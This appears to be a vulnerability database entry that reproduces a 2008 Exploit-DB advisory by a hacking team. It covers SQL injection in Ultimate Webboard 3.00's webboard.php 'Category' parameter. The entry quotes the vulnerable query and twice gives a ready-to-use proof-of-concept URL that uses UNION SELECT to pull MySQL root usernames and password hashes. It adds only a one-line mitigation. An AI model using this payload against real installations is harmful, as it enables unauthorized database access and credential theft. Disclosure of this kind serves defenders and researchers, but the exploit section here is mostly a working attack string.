Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability

vendor:

Webboard

by:

CWH Underground

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Webboard

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:php:webboard:3.00

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability

A vulnerability exists in Ultimate Webboard 3.00, where a remote attacker can inject arbitrary SQL commands via the 'Category' parameter in the 'webboard.php' script. Magic Quote must be turned off for the attack to be successful. An example exploit URL is http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root

Mitigation:

Ensure that Magic Quote is turned on and that user input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

================================================================================
  Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability
================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 26 September 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : Ultimate Webboard 
VERSION     : 3.00
DOWNLOAD    : http://php.deeserver.net/download/get/79/webboard3.0.0.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (webboard.php)
-----------------------------------

$sql="select * from board_data where Category='$Category' order by No DESC";

---------
 Exploit
---------

[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection]


------
 POC
------

[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root


#####################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-26]